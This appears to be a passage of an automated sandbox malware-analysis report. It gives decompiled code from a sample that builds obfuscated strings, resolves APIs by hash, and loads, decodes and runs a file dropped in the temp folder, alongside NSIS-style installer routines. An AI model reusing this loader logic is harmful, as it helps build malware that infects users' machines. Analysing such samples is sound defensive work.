              • Instruction Fuzzy Hash: E8F0A736348258BBD7115E56DC04B9F7F99DFD1760F10C027FA049A280D6B09A54C7A9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 77%
              			E7306B070() {
              				intOrPtr _v8;
              				signed int _v12;
              				void* _v16;
              				void* _v20;
              				short _v22;
              				short _v24;
              				short _v26;
              				short _v28;
              				short _v30;
              				short _v32;
              				short _v34;
              				short _v36;
              				short _v38;
              				short _v40;
              				short _v42;
              				char _v44;
              				short _v46;
              				short _v48;
              				short _v50;
              				short _v52;
              				short _v54;
              				short _v56;
              				short _v58;
              				short _v60;
              				short _v62;
              				short _v64;
              				short _v66;
              				short _v68;
              				short _v70;
              				short _v72;
              				short _v74;
              				char _v76;
              				intOrPtr _v80;
              				intOrPtr _v84;
              				intOrPtr _v88;
              				intOrPtr _v92;
              				intOrPtr _v96;
              				intOrPtr _v100;
              				intOrPtr _v104;
              				intOrPtr _v108;
              				intOrPtr _v112;
              				intOrPtr _v116;
              				long _v120;
              				short _v1160;
              				short _t82;
              				short _t83;
              				short _t84;
              				short _t85;
              				short _t86;
              				short _t87;
              				short _t88;
              				short _t89;
              				short _t90;
              				short _t91;
              				short _t92;
              				short _t107;
              				short _t108;
              				short _t109;
              				short _t110;
              				short _t111;
              				short _t112;
              				short _t113;
              				short _t114;
              				short _t115;
              				short _t116;
              				short _t117;
              				short _t118;
              				short _t119;
              				short _t120;
              				short _t121;
              				void* _t129;
              				signed int _t130;
              				void* _t131;
              				int _t133;
              				void* _t136;
              
              				_t82 = 0x53;
              				_v44 = _t82;
              				_t83 = 0x68;
              				_v42 = _t83;
              				_t84 = 0x6c;
              				_v40 = _t84;
              				_t85 = 0x77;
              				_v38 = _t85;
              				_t86 = 0x61;
              				_v36 = _t86;
              				_t87 = 0x70;
              				_v34 = _t87;
              				_t88 = 0x69;
              				_v32 = _t88;
              				_t89 = 0x2e;
              				_v30 = _t89;
              				_t90 = 0x64;
              				_v28 = _t90;
              				_t91 = 0x6c;
              				_v26 = _t91;
              				_t92 = 0x6c;
              				_v24 = _t92;
              				_v22 = 0;
              				_v12 = _v12 & 0x00000000;
              				_v8 = E7306B737();
              				_v84 = E7306B7E6(_v8, 0x7fc01dae);
              				_v116 = E7306B7E6(_v8, 0xff7f721a);
              				_v80 = E7306B7E6(_v8, 0x7fd6a366);
              				_v88 = E7306B7E6(_v80( &_v44), 0x7f5a653a);
              				_v112 = E7306B7E6(_v8, 0x7f91a078);
              				_v92 = E7306B7E6(_v8, 0x7fe63623);
              				_v96 = E7306B7E6(_v8, 0x7fbd727f);
              				_v100 = E7306B7E6(_v8, 0x7fb47add);
              				_v104 = E7306B7E6(_v8, 0x7fe7f840);
              				_t146 = _v8;
              				_v108 = E7306B7E6(_v8, 0x7fe1f1fb);
              				_t107 = 0x39;
              				_v76 = _t107;
              				_t108 = 0x72;
              				_v74 = _t108;
              				_t109 = 0x76;
              				_v72 = _t109;
              				_t110 = 0x73;
              				_v70 = _t110;
              				_t111 = 0x63;
              				_v68 = _t111;
              				_t112 = 0x64;
              				_v66 = _t112;
              				_t113 = 0x30;
              				_v64 = _t113;
              				_t114 = 0x6a;
              				_v62 = _t114;
              				_t115 = 0x30;
              				_v60 = _t115;
              				_t116 = 0x62;
              				_v58 = _t116;
              				_t117 = 0x34;
              				_v56 = _t117;
              				_t118 = 0x6e;
              				_v54 = _t118;
              				_t119 = 0x31;
              				_v52 = _t119;
              				_t120 = 0x6f;
              				_v50 = _t120;
              				_t121 = 0x77;
              				_v48 = _t121;
              				_v46 = 0;
              				_v84(0x103,  &_v1160);
              				_v88( &_v1160,  &_v76);
              				_t129 = CreateFileW( &_v1160, 0x80000000, 7, 0, 3, 0x80, 0);
              				_v20 = _t129;
              				if(_v20 != 0xffffffff) {
              					_t130 = _v96(_v20, 0);
              					_v12 = _t130;
              					if(_v12 != 0xffffffff) {
              						_t131 = VirtualAlloc(0, _v12, 0x3000, 4);
              						_v16 = _t131;
              						if(_v16 != 0) {
              							_t133 = ReadFile(_v20, _v16, _v12,  &_v120, 0);
              							if(_t133 != 0) {
              								CloseHandle(_v20);
              								_v16 = E7306BA78(_t146, _v16, _v12);
              								_t136 = E7306BF13(_v16); // executed
              								ExitProcess(0);
              							}
              							return _t133;
              						}
              						return _t131;
              					}
              					return _t130;
              				}
              				return _t129;
              			}

              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 7306BA00
              Memory Dump Source
              • Source File: 00000004.00000002.470398757.000000007306B000.00000040.00020000.sdmp, Offset: 73060000, based on PE: true
              • Associated: 00000004.00000002.470375139.0000000073060000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470380318.0000000073061000.00000020.00020000.sdmp
              • Associated: 00000004.00000002.470388169.0000000073069000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.470394866.000000007306A000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470403984.000000007306D000.00000080.00020000.sdmp
              • Associated: 00000004.00000002.470409100.000000007306E000.00000002.00020000.sdmp
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 5a13b24aadd7caa35aa2ceb1e641975473ff8c2d31c77108ac66d1daa8e782c2
              • Instruction ID: 3f62b94f29e29ca8edf3507c48b81edf411075b46aedd00ec248de0fcc4fae94
              • Opcode Fuzzy Hash: 5a13b24aadd7caa35aa2ceb1e641975473ff8c2d31c77108ac66d1daa8e782c2
              • Instruction Fuzzy Hash: B1716C75E54348EBEB50CBE4EC51BEDBBB5AF48B10F204456E608FA2E4EB704A41DB05
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 60%
              			E00401F84(void* __ebx, void* __eflags) {
              				struct HINSTANCE__* _t18;
              				struct HINSTANCE__* _t26;
              				void* _t27;
              				struct HINSTANCE__* _t30;
              				CHAR* _t32;
              				intOrPtr* _t33;
              				void* _t34;
              
              				_t27 = __ebx;
              				asm("sbb eax, 0x42ecd8");
              				 *(_t34 - 4) = 1;
              				if(__eflags < 0) {
              					_push(0xffffffe7);
              					L15:
              					E00401423();
              					L16:
              					 *0x42eca8 =  *0x42eca8 +  *(_t34 - 4);
              					return 0;
              				}
              				_t32 = E00402A29(0xfffffff0);
              				 *(_t34 + 8) = E00402A29(1);
              				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
              					L3:
              					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
              					_t30 = _t18;
              					if(_t30 == _t27) {
              						_push(0xfffffff6);
              						goto L15;
              					}
              					L4:
              					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
              					if(_t33 == _t27) {
              						E00404EB3(0xfffffff7,  *(_t34 + 8));
              					} else {
              						 *(_t34 - 4) = _t27;
              						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
              							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x42f000, 0x40b040, 0x409000); // executed
              						} else {
              							E00401423( *((intOrPtr*)(_t34 - 0x20)));
              							if( *_t33() != 0) {
              								 *(_t34 - 4) = 1;
              							}
              						}
              					}
              					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004035BA(_t30) != 0) {
              						FreeLibrary(_t30);
              					}
              					goto L16;
              				}
              				_t26 = GetModuleHandleA(_t32); // executed
              				_t30 = _t26;
              				if(_t30 != __ebx) {
              					goto L4;
              				}
              				goto L3;
              			}

              APIs
              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FAF
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000,?), ref: 00404EEC
                • Part of subcall function 00404EB3: lstrlenA.KERNEL32(00402FE9,00429878,00000000,0041A276,74EC110C,?,?,?,?,?,?,?,?,?,00402FE9,00000000), ref: 00404EFC
                • Part of subcall function 00404EB3: lstrcatA.KERNEL32(00429878,00402FE9,00402FE9,00429878,00000000,0041A276,74EC110C), ref: 00404F0F
                • Part of subcall function 00404EB3: SetWindowTextA.USER32(00429878,00429878), ref: 00404F21
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F47
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F61
                • Part of subcall function 00404EB3: SendMessageA.USER32 ref: 00404F6F
              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FBF
              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401FCF
              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040203A
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
              • String ID:
              • API String ID: 2987980305-0
              • Opcode ID: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
              • Instruction ID: 67208966b8f2bf19d9e960a2271e5cf927c7fdd1345161600271a48ac580282b
              • Opcode Fuzzy Hash: b551240a240c733a4c981d6ec1ae38ebb0789affcf7669c1ea097dea2b4299ae
              • Instruction Fuzzy Hash: 48215B36904215EBDF216FA58E4DAAE7970AF44314F20423BFA01B22E0CBBC4941965E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 87%
              			E004015B3(char __ebx, void* __eflags) {
              				void* _t13;
              				int _t19;
              				char _t21;
              				void* _t22;
              				char _t23;
              				signed char _t24;
              				char _t26;
              				CHAR* _t28;
              				char* _t32;
              				void* _t33;
              
              				_t26 = __ebx;
              				_t28 = E00402A29(0xfffffff0);
              				_t13 = E0040574E(_t28);
              				_t30 = _t13;
              				if(_t13 != __ebx) {
              					do {
              						_t32 = E004056E5(_t30, 0x5c);
              						_t21 =  *_t32;
              						 *_t32 = _t26;
              						 *((char*)(_t33 + 0xb)) = _t21;
              						if(_t21 != _t26) {
              							L5:
              							_t22 = E004053F2(_t28);
              						} else {
              							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
              							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040540F(_t39) == 0) {
              								goto L5;
              							} else {
              								_t22 = E00405375(_t28); // executed
              							}
              						}
              						if(_t22 != _t26) {
              							if(_t22 != 0xb7) {
              								L9:
              								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
              							} else {
              								_t24 = GetFileAttributesA(_t28); // executed
              								if((_t24 & 0x00000010) == 0) {
              									goto L9;
              								}
              							}
              						}
              						_t23 =  *((intOrPtr*)(_t33 + 0xb));
              						 *_t32 = _t23;
              						_t30 = _t32 + 1;
              					} while (_t23 != _t26);
              				}
              				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
              					_push(0xfffffff5);
              					E00401423();
              				} else {
              					E00401423(0xffffffe6);
              					E00405BC7("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
              					_t19 = SetCurrentDirectoryA(_t28); // executed
              					if(_t19 == 0) {
              						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
              					}
              				}
              				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t33 - 4));
              				return 0;
              			}

              APIs
                • Part of subcall function 0040574E: CharNextA.USER32(00405500), ref: 0040575C
                • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405761
                • Part of subcall function 0040574E: CharNextA.USER32(00000000), ref: 00405770
              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 00401605
                • Part of subcall function 00405375: CreateDirectoryA.KERNELBASE(?,?,00000000), ref: 004053B8
              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401634
              Strings
              • C:\Users\user\AppData\Local\Temp, xrefs: 00401629
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CharNext$Directory$AttributesCreateCurrentFile
              • String ID: C:\Users\user\AppData\Local\Temp
              • API String ID: 1892508949-2935972921
              • Opcode ID: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
              • Instruction ID: f91ea4ffc010c5324243c64a5f93d27bb3485e0f7fec8187872c5a269388ad6c
              • Opcode Fuzzy Hash: 61034fe80c9a9cb978dfe94cf849e2fb3a16e6b52be6386198d2ddf70ce6f83f
              • Instruction Fuzzy Hash: F011EB35504141ABDF317FA55D419BF67B4E992324728063FF592722D2C63C4942AA2F
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 69%
              			E00401389(signed int _a4) {
              				intOrPtr* _t6;
              				void* _t8;
              				void* _t10;
              				signed int _t11;
              				void* _t12;
              				intOrPtr _t15;
              				signed int _t16;
              				signed int _t17;
              				void* _t18;
              
              				_t17 = _a4;
              				while(_t17 >= 0) {
              					_t15 =  *0x42ec50; // 0x505b54
              					_t6 = _t17 * 0x1c + _t15;
              					if( *_t6 == 1) {
              						break;
              					}
              					_push(_t6); // executed
              					_t8 = E00401434(); // executed
              					if(_t8 == 0x7fffffff) {
              						return 0x7fffffff;
              					}
              					_t10 = E0040136D(_t8);
              					if(_t10 != 0) {
              						_t11 = _t10 - 1;
              						_t16 = _t17;
              						_t17 = _t11;
              						_t12 = _t11 - _t16;
              					} else {
              						_t12 = _t10 + 1;
              						_t17 = _t17 + 1;
              					}
              					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
              						 *0x42e40c =  *0x42e40c + _t12;
              						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e40c, 0x7530,  *0x42e3f4), 0);
              					}
              				}
              				return 0;
              			}

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: MessageSend
              • String ID: T[P
              • API String ID: 3850602802-2798684693
              • Opcode ID: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
              • Instruction ID: 74927b77398f0d82d02f0f32bcc48ccf03ca760f88dcf9e2e40121dab22ba05a
              • Opcode Fuzzy Hash: 1418929eafbb73b8fb58d843c81c3155069c7e16b288247307ca07652a38143c
              • Instruction Fuzzy Hash: 4901F431B242209BE7195B399C09B6A3698E710328F10863BF851F72F1D678DC039B4D
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E00405F57(signed int _a4) {
              				struct HINSTANCE__* _t5;
              				signed int _t10;
              
              				_t10 = _a4 << 3;
              				_t8 =  *(_t10 + 0x409208);
              				_t5 = GetModuleHandleA( *(_t10 + 0x409208));
              				if(_t5 != 0) {
              					L2:
              					return GetProcAddress(_t5,  *(_t10 + 0x40920c));
              				}
              				_t5 = E00405EE9(_t8); // executed
              				if(_t5 == 0) {
              					return 0;
              				}
              				goto L2;
              			}

              APIs
              • GetModuleHandleA.KERNEL32(?,?,?,00403194,0000000D), ref: 00405F69
              • GetProcAddress.KERNEL32(00000000,?,?,?,00403194,0000000D), ref: 00405F84
                • Part of subcall function 00405EE9: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405F00
                • Part of subcall function 00405EE9: wsprintfA.USER32 ref: 00405F39
                • Part of subcall function 00405EE9: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F4D
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
              • String ID:
              • API String ID: 2547128583-0
              • Opcode ID: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
              • Instruction ID: bbbe084413d2e6f7ef046b623ea8b92179420db3b6db08e2e7fdeef9d7d4980c
              • Opcode Fuzzy Hash: c95d3685517970e0c019aac56d97440eb4eeb9d6cd7db5aa949554c45ee13345
              • Instruction Fuzzy Hash: 5DE08C32B08A12BAD6109B719D0497B72ACDEC8640300097EF955F6282D738AC11AAA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 68%
              			E0040589E(CHAR* _a4, long _a8, long _a12) {
              				signed int _t5;
              				void* _t6;
              
              				_t5 = GetFileAttributesA(_a4); // executed
              				asm("sbb ecx, ecx");
              				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
              				return _t6;
              			}

              APIs
              • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\Public\vbc.exe,80000000,00000003), ref: 004058A2
              • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: File$AttributesCreate
              • String ID:
              • API String ID: 415043291-0
              • Opcode ID: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
              • Instruction ID: e615d4ce70e2a600ad3370b8a7bf294de68ab1b424622093f8f4c5f34a5113e1
              • Opcode Fuzzy Hash: 5340b84021e5d080a0f841e0942d03c921a309eaf12029fe197c00c0f40f89c7
              • Instruction Fuzzy Hash: D5D09E31658301AFEF098F20DD1AF2EBBA2EB84B01F10962CB646940E0D6715C59DB16
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E0040587F(CHAR* _a4) {
              				signed char _t3;
              
              				_t3 = GetFileAttributesA(_a4); // executed
              				if(_t3 != 0xffffffff) {
              					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
              				}
              				return _t3;
              			}

              APIs
              • GetFileAttributesA.KERNELBASE(?,0040568A,?,?,?), ref: 00405883
              • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405895
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: AttributesFile
              • String ID:
              • API String ID: 3188754299-0
              • Opcode ID: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
              • Instruction ID: cb5a672fe6ba1e8618a417a0682e77d28f0f111bf9a29bd8adb2d3f05be15d2c
              • Opcode Fuzzy Hash: 526d85b860984864a1b6eb1eb54cd64df673d9b311570f6054ba349a806b51eb
              • Instruction Fuzzy Hash: FDC04C71C08501ABD6016B34EF0DC5F7B66EB50322B14CB35F469A01F0C7315C66DA2A
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004053F2(CHAR* _a4) {
              				int _t2;
              
              				_t2 = CreateDirectoryA(_a4, 0); // executed
              				if(_t2 == 0) {
              					return GetLastError();
              				}
              				return 0;
              			}

              APIs
              • CreateDirectoryA.KERNELBASE(?,00000000,0040311D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 004053F8
              • GetLastError.KERNEL32 ref: 00405406
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: CreateDirectoryErrorLast
              • String ID:
              • API String ID: 1375471231-0
              • Opcode ID: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
              • Instruction ID: 813393d6953da14087893f37eb662e151031eda4d181b9a341b076b840c4c01a
              • Opcode Fuzzy Hash: e7d0addc6a0e2cebebc6ed5ef3cfbde17ba04572b5523194c914a84283870961
              • Instruction Fuzzy Hash: 27C04C30619502DAD7105B31DD08B5B7E50AB50742F219535A506E11E1D6349492D93E
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004030B0(void* _a4, long _a8) {
              				int _t6;
              				long _t10;
              
              				_t10 = _a8;
              				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
              				if(_t6 == 0 || _a8 != _t10) {
              					return 0;
              				} else {
              					return 1;
              				}
              			}

              APIs
              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 004030C7
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: FileRead
              • String ID:
              • API String ID: 2738559852-0
              • Opcode ID: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
              • Instruction ID: 90557e19d7482b95f4dd5f96256efcc3496d5940ec1e4df6b8622c0cc682be59
              • Opcode Fuzzy Hash: 27fbe12f246225e3c312bde4903856853e362ca19ec2099a42773af8ab92d4e2
              • Instruction Fuzzy Hash: A1E08C32201118BBCF205E519D00AA73B9CEB043A2F008032BA18E51A0D630EA11ABA9
              Uniqueness

              Uniqueness Score: -1.00%

              C-Code - Quality: 100%
              			E004030E2(long _a4) {
              				long _t2;
              
              				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
              				return _t2;
              			}

              APIs
              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,000087E4), ref: 004030F0
              Memory Dump Source
              • Source File: 00000004.00000002.467452565.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000004.00000002.467447753.0000000000400000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467458478.0000000000407000.00000002.00020000.sdmp
              • Associated: 00000004.00000002.467463161.0000000000409000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467473115.000000000042C000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467477042.0000000000434000.00000004.00020000.sdmp
              • Associated: 00000004.00000002.467481807.0000000000437000.00000002.00020000.sdmp
              Similarity
              • API ID: FilePointer
              • String ID:
              • API String ID: 973152223-0
              • Opcode ID: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
              • Instruction ID: aafe5e0ddee8b519ffd98e4e857b28c3b9165386d483fecacc2863ad1570d206
              • Opcode Fuzzy Hash: b482a8c56bd79b67497ba547cc3d1d0f84b07fc9ac7ac5f50d4e9ed509354c89
              • Instruction Fuzzy Hash: D6B01231544200BFDB214F00DF06F057B21B79C701F208030B340380F082712430EB1E
              Uniqueness

              Uniqueness Score: -1.00%

              Non-executed Functions

              C-Code - Quality: 96%
              			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
              				struct HWND__* _v8;
              				long _v12;
              				struct tagRECT _v28;
              				void* _v36;
              				signed int _v40;
              				int _v44;
              				int _v48;
              				signed int _v52;
              				int _v56;
              				void* _v60;
              				void* _v68;
              				void* __ebx;
              				void* __edi;
              				void* __esi;
              				long _t87;
              				unsigned int _t92;
              				unsigned int _t93;
              				int _t94;
              				int _t95;
              				long _t98;
              				void* _t101;
              				intOrPtr _t123;
              				struct HWND__* _t127;
              				int _t149;
              				int _t150;
              				struct HWND__* _t154;
              				struct HWND__* _t158;
              				struct HMENU__* _t160;
              				long _t162;
              				void* _t163;
              				short* _t164;
              
              				_t154 =  *0x42e404; // 0x0
              				_t149 = 0;
              				_v8 = _t154;
              				if(_a8 != 0x110) {
              					__eflags = _a8 - 0x405;
              					if(_a8 == 0x405) {
              						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
              					}
              					__eflags = _a8 - 0x111;
              					if(_a8 != 0x111) {
              						L17:
              						__eflags = _a8 - 0x404;
              						if(_a8 != 0x404) {
              							L25:
              							__eflags = _a8 - 0x7b;
              							if(_a8 != 0x7b) {
              								goto L20;
              							}
              							__eflags = _a12 - _t154;
              							if(_a12 != _t154) {
              								goto L20;
              							}
              							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
              							__eflags = _t87 - _t149;
              							_a8 = _t87;
              							if(_t87 <= _t149) {
              								L37:
              								return 0;
              							}
              							_t160 = CreatePopupMenu();
              							AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
              							_t92 = _a16;
              							__eflags = _t92 - 0xffffffff;
              							if(_t92 != 0xffffffff) {
              								_t150 = _t92;
              								_t93 = _t92 >> 0x10;
              								__eflags = _t93;
              								_t94 = _t93;
              							} else {
              								GetWindowRect(_t154,  &_v28);
              								_t150 = _v28.left;
              								_t94 = _v28.top;
              							}
              							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
              							_t162 = 1;
              							__eflags = _t95 - 1;
              							if(_t95 == 1) {
              								_v60 = _t149;
              								_v48 = 0x42a0a0;
              								_v44 = 0xfff;
              								_a4 = _a8;
              								do {
              									_a4 = _a4 - 1;
              									_t98 = SendMessageA(_v8, 0x102d, _a4,  &_v68);
              									__eflags = _a4 - _t149;
              									_t162 = _t162 + _t98 + 2;
              								} while (_a4 != _t149);
              								OpenClipboard(_t149);
              								EmptyClipboard();
              								_t101 = GlobalAlloc(0x42, _t162);
              								_a4 = _t101;
              								_t163 = GlobalLock(_t101);
              								do {
              									_v48 = _t163;
              									_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
              									 *_t164 = 0xa0d;
              									_t163 = _t164 + 2;
              									_t149 = _t149 + 1;
              									__eflags = _t149 - _a8;
              								} while (_t149 < _a8);
              								GlobalUnlock(_a4);
              								SetClipboardData(1, _a4);
              								CloseClipboard();
              							}
              							goto L37;
              						}
              						__eflags =  *0x42e3ec - _t149; // 0x0
              						if(__eflags == 0) {
              							ShowWindow( *0x42ec28, 8);
              							__eflags =  *0x42ecac - _t149; // 0x0
              							if(__eflags == 0) {
              								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
              							}
              							E00403E5C(1);
              							goto L25;
              						}
              						 *0x429468 = 2;
